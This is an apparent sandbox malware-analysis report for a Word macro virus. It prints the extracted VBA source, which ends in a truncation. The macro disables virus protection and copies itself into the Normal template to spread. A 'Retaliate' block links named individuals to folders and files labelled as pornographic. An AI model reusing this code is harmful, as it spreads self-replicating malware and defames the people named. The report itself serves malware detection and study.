Doc.Trojan.MyEnemy-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 d541bb7f0a891d62…

MALICIOUS

Office (OLE)

44.5 KB Created: 2000-12-14 16:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: aef1f42aaf12e3e9eb67cbba34d1877b SHA-1: 48a054b921e88a89bcee0a66f46fd2d6391797a9 SHA-256: d541bb7f0a891d6259eb5ed83329e3b51962046038a91ff7410c955047cdfce4
120 Risk Score

Malware Insights

Doc.Trojan.MyEnemy-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.MyEnemy-1'. It contains VBA macros, specifically a 'Document_Open' macro, which is a common technique for executing malicious code when the document is opened. The script appears to be designed to copy itself to the Normal template and potentially download or execute further malicious content, although the exact payload mechanism is obfuscated.

Heuristics 3

  • ClamAV: Doc.Trojan.MyEnemy-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.MyEnemy-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21361 bytes
SHA-256: 65af0c66c09a906944dedcba0de105c40647942a05a20a67c5bd70dd04216fd5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim acd, ntt As Object
Dim MyEnemy$(20, 1)
Dim MyPhoto$(10)
Dim MyVideo$(6)
Dim MyExten$(5)
Dim zw As Byte
Const mrk = "čó ŕčŕ čŕĺńč îňâđů îçęç îčńđâéŔ .ÂđńíďńíÔíđâęěń îŕččď ŕŕóĘěńŕîî .Â"
Private Sub document_open()
 On Error Resume Next
 Options.VirusProtection = False
 Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
 Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
 If Not acd.codemodule.Find(mrk, 1, 1, 1000, 1000) Then acd.codemodule.deletelines 1, acd.codemodule.countoflines
 If Not ntt.codemodule.Find(mrk, 1, 1, 1000, 1000) Then ntt.codemodule.deletelines 1, ntt.codemodule.countoflines
End Sub
Private Sub document_close()
 On Error Resume Next
 Options.VirusProtection = False
 Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
 Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
 s$ = ""
 If (acd.codemodule.countoflines <= 1) And ((ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate)) Then
  v2 = 1
  For v = 1 To ntt.codemodule.countoflines
   s$ = ntt.codemodule.lines(v, 1)
   If s$ <> "" Then
    acd.codemodule.insertlines v2, s$
    v2 = v2 + 1
   End If
  Next v
 End If
 ActiveDocument.Save
 If ntt.codemodule.countoflines <= 1 Then
  v2 = 1
  For v = 1 To acd.codemodule.countoflines
   s$ = acd.codemodule.lines(v, 1)
   If s$ <> "" Then
    ntt.codemodule.insertlines v2, s$
    v2 = v2 + 1
   End If
  Next v
 End If
 NormalTemplate.Save
 'Retaliate
 MyEnemy$(0, 0) = "Ôđîëîâ Î. Ŕ."
 MyEnemy$(1, 0) = "Ĺěĺëü˙íĺíęî Â. Â."
 MyEnemy$(2, 0) = "Ďîäăîđíîâŕ Ĺ. Č."
 MyEnemy$(3, 0) = "Ěŕňđîńîâŕ Îëüăŕ Ĺâăĺíüĺâíŕ"
 MyEnemy$(4, 0) = "Ęîâŕëĺâŕ Î Ţ"
 MyEnemy$(5, 0) = "Ěîńčí Ę. Ď."
 MyEnemy$(6, 0) = "Řŕëűăčí Ď. Ń."
 MyEnemy$(7, 0) = "Ëčőňĺđ Ŕíŕňîëčé Ěčőŕéëîâč÷"
 MyEnemy$(8, 0) = "Ŕ. Ě. Ęŕđďîâ"
 MyEnemy$(9, 0) = "Ęîçëîâ Ŕíäđĺé Ŕëĺęńŕíäđîâč÷"
 MyEnemy$(10, 0) = "Ďŕâëîâŕ Îëüăŕ"
 MyEnemy$(11, 0) = "Äěčňđčĺâ Ńĺđăĺé"
 MyEnemy$(12, 0) = "Bob Klein"
 MyEnemy$(13, 0) = "Jim Rein"
 MyEnemy$(14, 0) = "John A. Hopkins"
 MyEnemy$(15, 0) = "Garry Wood"
 MyEnemy$(17, 0) = "Debra Henriksen"
 MyEnemy$(18, 0) = "Patricia "
 MyEnemy$(19, 0) = "Hitler"
 
 For v = 0 To 19
  If (v <= 11) Or (v = 19) Then
   MyEnemy$(v, 1) = "C:\Ěîč äîęóěĺíňű"
  Else
   MyEnemy$(v, 1) = "C:\My documents"
  End If
 Next v
 MyEnemy$(0, 1) = MyEnemy$(0, 1) + "\Ňđŕőŕíüĺ\"
 MyEnemy$(1, 1) = MyEnemy$(1, 1) + "\Ďîđíî\"
 MyEnemy$(2, 1) = MyEnemy$(2, 1) + "\Ńĺęń\"
 MyEnemy$(3, 1) = MyEnemy$(3, 1) + "\Čçâđŕůĺíč˙\"
 MyEnemy$(4, 1) = MyEnemy$(4, 1) + "\Ňđŕő\"
 MyEnemy$(5, 1) = MyEnemy$(5, 1) + "\Ęëóáíč÷ęŕ\"
 MyEnemy$(6, 1) = MyEnemy$(6, 1) + "\Äĺâóřęč\Ăĺë˙\"
 MyEnemy$(7, 1) = MyEnemy$(7, 1) + "\Ôîňęč äĺâóřĺę\Ęîěčńńŕđîâŕ Ŕíăĺëčíŕ Âčňŕëüĺâíŕ\"
 MyEnemy$(8, 1) = "C:\Ňîëüęî äë˙ ěĺí˙\Ďîđíóőŕ\Ăĺëęŕ\"
 MyEnemy$(9, 1) = MyEnemy$(9, 1) + "\Îáíŕćĺííŕ˙ íŕňóđŕ\Ŕíăĺëčíŕ\"
 MyEnemy$(10, 1) = MyEnemy$(10, 1) + "\Ńĺęń_ęîëëĺęöč˙\Ęîěčńńŕđîâŕ_Ŕ_Â\"
 MyEnemy$(11, 1) = MyEnemy$(11, 1) + "\Ëó÷řčĺ ďîďęč ăîđîäŕ\"
 MyEnemy$(12, 1) = MyEnemy$(12, 1) + "\Russian Porno\"
 MyEnemy$(13, 1) = MyEnemy$(13, 1) + "\Russian Girls\Comissarova\"
 MyEnemy$(14, 1) = MyEnemy$(14, 1) + "\Russian Fuck\Gelka"
 MyEnemy$(15, 1) = MyEnemy$(15, 1) + "\Nudo\G\"
 MyEnemy$(16, 1) = MyEnemy$(16, 1) + "\Sex Show 1\Gela\"
 MyEnemy$(17, 1) = MyEnemy$(17, 1) + "\Sex Collection\"
 MyEnemy$(18, 1) = MyEnemy$(18, 1) + "\Crazy Sex\"
 MyEnemy$(19, 1) = MyEnemy$(19, 1) + "\Âűńňŕâęŕ ńĺęńŕ\Đîńńč˙\Ŕńňđŕőŕíü\"
 
 MyPhoto$(0) = "Angelina"
 MyPhoto$(1) = "Gela"
 MyPhoto$(2) = "Body_A"
 MyPhoto$(3) = "Fuck"
 MyPhoto$(4) = "Fuck_ass"
 MyPhoto$(5) = "Ass"
 MyPhoto$(6) = "Cnt"
 MyPhoto$(7) = "Klzm"
 MyPhoto$(8) = "Kk"
 MyPhoto$(9) = "Urn"
 
 MyVideo$(0) = "Gela&Seryj"
 MyVideo$(1) = "Gela&Vlad"
 MyVideo$(2) = "Gela&Tolj
... (truncated)